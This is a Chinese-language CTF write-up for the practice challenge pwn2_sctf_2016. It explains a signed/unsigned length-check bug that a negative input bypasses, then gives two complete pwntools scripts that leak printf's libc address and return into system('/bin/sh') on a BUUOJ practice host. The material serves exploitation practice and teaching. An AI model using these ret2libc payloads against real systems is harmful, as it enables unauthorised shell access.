pwn2_sctf_2016(printf libc)
一个整数溢出,注意get_n函数把a2转换为了unsigned int类型,但在vuln函数里面比较的是int类型:有符号比较时-1能通过检查,转成unsigned int后却变成一个很大的长度。


输入-1即可绕过
这里的libc是不是太老了都打不通
exp
# Exploit script for pwn2_sctf_2016 (32-bit, ret2plt leak followed by ret2libc).
# Root cause, as stated in the writeup above: get_n() converts the length to
# unsigned int while vuln() compares it as a signed int, so a negative value
# passes the check and is presumably used afterwards as a very large read
# size. The corresponding fix would be to perform the bounds check on the
# same (unsigned) type that is later used for the read, or reject negatives.
from pwn import *
from LibcSearcher import *
io = remote('node5.buuoj.cn',29978)   # practice target and port from the writeup
elf = ELF('./pwn2_sctf_2016')
main = elf.sym['main']                 # returned into after the leak so vuln() can be reached again
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
io.sendline(b'-1')                     # -1 passes the signed comparison (see note at top)
# Stage 1: overwrite the return address with printf@plt, return into main
# afterwards, and hand printf@got to printf as its argument, so the resolved
# libc address of printf is written to the output. 0x2C+4 presumably covers
# the local buffer plus saved ebp -- TODO confirm against the stack layout.
payload1 = cyclic(0x2C+4) + p32(printf_plt) + p32(main) + p32(printf_got)
io.sendline(payload1)
# Read up to the first 0xf7 byte and take the last 4 bytes as the leaked
# pointer; this assumes the remote libc mapping's top byte is 0xf7, so
# verify the printed value looks like a libc address.
printf = u32(io.recvuntil('\xf7')[-4:])
print(hex(printf))
libc = LibcSearcher('printf',printf)   # identify the remote libc build from the leaked printf address
libc_base = printf - libc.dump('printf')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
io.sendline(b'-1')                     # second pass through the same length check
# Stage 2: same overflow, now returning into system("/bin/sh") with main as
# the fake return address.
payload2 = cyclic(0x2C+4) + p32(system_addr) + p32(main) + p32(binsh_addr)
io.sendline(payload2)
io.interactive()
这个可以了,是libc-2.23.so
exp2
# Second version of the exploit: identical flow to exp above, but the
# remote libc was identified as libc-2.23.so (see the writeup), so offsets
# are taken from the local ELF instead of LibcSearcher.
from pwn import *
from LibcSearcher import *             # no longer used below; kept from the first version
io = remote('node5.buuoj.cn',26690)   # practice target and port from the writeup
elf = ELF('./pwn2_sctf_2016')
libc=ELF('./libc-2.23.so')             # local copy of the remote libc, used for symbol offsets
main = elf.sym['main']                 # returned into after the leak so vuln() can be reached again
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
io.sendline(b'-1')                     # -1 passes the signed comparison in vuln() (writeup above)
# Stage 1: return into printf@plt with printf@got as the argument, then back
# into main; this writes the resolved libc address of printf to the output.
# 0x2C+4 presumably covers the local buffer plus saved ebp -- TODO confirm.
payload1 = cyclic(0x2C+4) + p32(printf_plt) + p32(main) + p32(printf_got)
io.sendline(payload1)
# Read up to the first 0xf7 byte and take the last 4 bytes as the leaked
# pointer; assumes the libc mapping's top byte is 0xf7 on the remote.
printf = u32(io.recvuntil('\xf7')[-4:])
print(hex(printf))
#libc = LibcSearcher('printf',printf)
libc_base = printf - libc.symbols['printf']   # base = leaked address - offset of printf in libc-2.23.so
#system_addr = libc_base + libc.dump('system')
#binsh_addr = libc_base + libc.dump('str_bin_sh')
system_addr = libc_base + libc.symbols['system']
# First occurrence of the NUL-terminated "/bin/sh" string inside the libc image.
binsh_addr = libc_base + libc.search(b'/bin/sh\x00').__next__()
io.sendline(b'-1')                     # second pass through the same length check
# Stage 2: same overflow, now returning into system with the "/bin/sh"
# pointer as its argument and main as the fake return address.
payload2 = cyclic(0x2C+4) + p32(system_addr) + p32(main) + p32(binsh_addr)
io.sendline(payload2)
io.interactive()
